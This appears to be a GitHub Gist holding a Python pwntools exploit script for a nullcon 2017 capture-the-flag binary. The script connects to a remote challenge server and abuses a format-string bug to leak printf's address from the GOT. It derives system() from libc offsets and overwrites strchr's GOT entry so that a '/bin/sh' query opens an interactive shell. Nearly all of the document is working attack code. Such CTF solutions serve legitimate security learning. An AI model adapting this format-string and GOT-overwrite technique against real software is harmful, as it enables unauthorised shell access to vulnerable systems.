Created
March 26, 2017 11:46
-
-
Save rverton/5164f9ffa7ff5cadbe130ea9ac24d42a to your computer and use it in GitHub Desktop.
exploit for level1.bin (nullcon 2017)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# exploit for level1.bin (nullcon 2017) | |
from pwn import * | |
def add_book(p): | |
p.sendline('1') | |
p.recvuntil('Enter book name: ') | |
p.sendline('a') | |
p.recvuntil('Enter book id: ') | |
p.sendline('1') | |
def leak_addr(p, addr): | |
p.sendline('3') | |
p.recvuntil('Enter query: ') | |
leak_fmt_str = p32(addr) + "%11$s" | |
p.sendline(leak_fmt_str) | |
result = p.recvline().strip() | |
return u32(result[20:24]) | |
if __name__ == '__main__': | |
#p = process('./level1.bin', stdin=process.PTY) | |
p = remote('34.198.96.6', 9001) | |
p.recvuntil('Enter choice: ') | |
add_book(p) | |
p.recvuntil('Enter choice: ') | |
printf = leak_addr(p, 0x804b014) | |
printf_offset = 0x0004cdd0 | |
system_offset = 0x0003fe70 | |
system = printf - printf_offset + system_offset | |
strchr_got = 0x804b030 | |
log.info("printf @ %#x" % printf) | |
log.info("system @ %#x" % system) | |
payload = "/bin/sh # " | |
payload += fmtstr_payload(14, {strchr_got: system}, numbwritten=12) | |
p.sendline('3') | |
p.recvuntil('Enter query: ') | |
p.sendline(payload) | |
p.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment